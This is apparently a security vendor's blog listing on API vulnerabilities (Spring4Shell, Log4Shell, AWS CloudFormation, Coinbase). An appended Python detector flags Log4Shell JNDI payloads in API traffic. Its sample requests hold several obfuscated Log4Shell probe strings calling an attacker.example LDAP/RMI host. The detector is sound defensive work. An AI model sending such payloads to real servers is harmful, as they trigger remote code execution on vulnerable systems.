New Wiz Partnership Provides Full Visibility, Context, and Control of all Your Cloud APIs
We are all excited about our new strategic partnership with Wiz. Our latest integration gives corporate information security teams unprecedented visibility and control of the APIs scattered across their entire cloud estate. Wiz is the fastest-growing software company in the world for good reason. Their cloud-native, agentless platform connects in ... Read More
Two New RCE Vulnerabilities in Spring
Introduction Between March 29th and March 31st, 2022, two new zero-day vulnerabilities were discovered in the Spring Framework, a framework widely used by Java developers. Both vulnerabilities allow remote code execution (RCE); the more recent one, dubbed “Spring4Shell,” is by far the more severe of the two and ... Read More
Coinbase Fixes Vulnerable API that Let You Sell Bitcoin You Didn’t Own
On Friday, February 11th 2022, a security researcher (Tree_of_Alpha on Twitter) discovered a flaw in Coinbase’s new Advanced Trading feature that allowed users to sell cryptocurrencies without owning them. According to the Coinbase blog, the flaw was resolved in a matter of hours without any malicious exploitation. And Coinbase paid ... Read More
BreakingFormation: API Vulnerability in the AWS CloudFormation API
On January 13th, 2022, researchers from Orca Security published a vulnerability found in the AWS CloudFormation API, the service that helps users model and set up their AWS resources. The vulnerability gave the researchers file-read and credential-disclosure primitives on an internal AWS service, which they leveraged to leak ... Read More
Active Testing: Runtime Detection for Log4j Vulnerability in APIs
As mentioned in an earlier blog post, the Log4j vulnerability poses new risks to APIs. APIs are both a new attack vector for this exploit and a way for attackers to extend their reach once inside ... Read More
Log4j Vulnerability: APIs Causing Massive Risk Exposure
Security teams around the globe are scrambling to address the Apache Log4j 2 vulnerability (CVE-2021-44228), dubbed “Log4Shell”, which can be trivially exploited to take control of vulnerable systems remotely. At the same time, attackers are actively scanning the internet for affected systems. The United States Cybersecurity and Infrastructure Security Agency issued ... Read More
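The two Log4j posts above describe detecting Log4Shell payloads arriving through API traffic. The following is an added example written for this page; it is not code from the original posts or from the vendor's product. It scans the URL, headers and JSON body fields of API requests for JNDI lookups, and first unwinds the nested `${lower:..}`, `${upper:..}` and `${key:-default}` lookups attackers use to hide the literal `jndi:` string, plus URL encoding. The request samples, the `attacker.example` host and the field names are constructed for illustration.

```python
"""Detect Log4Shell (CVE-2021-44228) JNDI lookup payloads in API requests.

Added example, not from the original posts. The sample requests below are
constructed; attacker.example is a placeholder host.
"""
import re
from urllib.parse import unquote

# An innermost ${...}: its body contains no braces, so no nested lookup is inside it.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# The payload we are looking for once obfuscation has been stripped away.
JNDI = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|nis|nds|corba)\s*:", re.I)


def _resolve(body: str) -> str:
    """Evaluate one innermost Log4j lookup the way a vulnerable Log4j 2 would."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()          # ${lower:J} -> j
    if low.startswith("upper:"):
        return body[6:].upper()          # ${upper:j} -> J
    if low.startswith("jndi:"):
        return body                      # reached the payload; just drop the braces
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: an absent key falls back to its default value
        return body.split(":-", 1)[1]
    return body                          # unknown lookup: unwrap so the text stays searchable


def normalize(value: str, max_rounds: int = 200) -> str:
    """URL-decode (twice, for double encoding) and resolve lookups inside-out."""
    text = unquote(unquote(value))
    for _ in range(max_rounds):          # each round removes one ${...}, so this terminates
        new = LOOKUP.sub(lambda m: _resolve(m.group(1)), text, count=1)
        if new == text:
            break
        text = new
    return text


def find_jndi(value: str):
    """Return the matched 'jndi:<scheme>:' prefix if the value carries a payload."""
    m = JNDI.search(normalize(value))
    return m.group(0) if m else None


def scan_request(request: dict) -> list:
    """Return [(location, matched_prefix), ...] for every suspicious field in one request."""
    fields = [("url", request.get("url", ""))]
    fields += [(f"header:{k}", v) for k, v in request.get("headers", {}).items()]
    fields += [(f"body:{k}", str(v)) for k, v in request.get("body", {}).items()]
    hits = []
    for location, value in fields:
        hit = find_jndi(value)
        if hit:
            hits.append((location, hit))
    return hits


# Constructed sample traffic: one benign request and three obfuscated probes.
SAMPLE_REQUESTS = [
    {"url": "/api/v1/users?name=alice",
     "headers": {"User-Agent": "curl/7.79.1"},
     "body": {"note": "price is ${amount}"}},          # plain template text, not a payload
    {"url": "/api/v1/login",
     "headers": {"User-Agent": "${jndi:ldap://attacker.example:1389/a}"},
     "body": {}},
    {"url": "/api/v1/search?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fx%7D",
     "headers": {}, "body": {}},                        # URL-encoded ${${lower:j}ndi:ldap://...}
    {"url": "/api/v1/items",
     "headers": {"X-Api-Version": "${${env:NaN:-j}ndi${env:NaN:-:}${::-r}mi://attacker.example/y}"},
     "body": {"comment": "${jndi:${lower:L}dap://attacker.example/z}"}},
]


def scan_all(requests: list) -> dict:
    """Map request index -> hits, keeping only requests that produced at least one hit."""
    return {i: h for i, r in enumerate(requests) if (h := scan_request(r))}


if __name__ == "__main__":
    for index, hits in scan_all(SAMPLE_REQUESTS).items():
        print(f"request {index}: {hits}")
```

Run it over the samples and only requests 1, 2 and 3 are reported; the benign `${amount}` template in request 0 is unwrapped but never yields a `jndi:` prefix. Matching on the raw string for `${jndi:` would miss requests 2 and 3 entirely, which is why the normalization step comes before the pattern check.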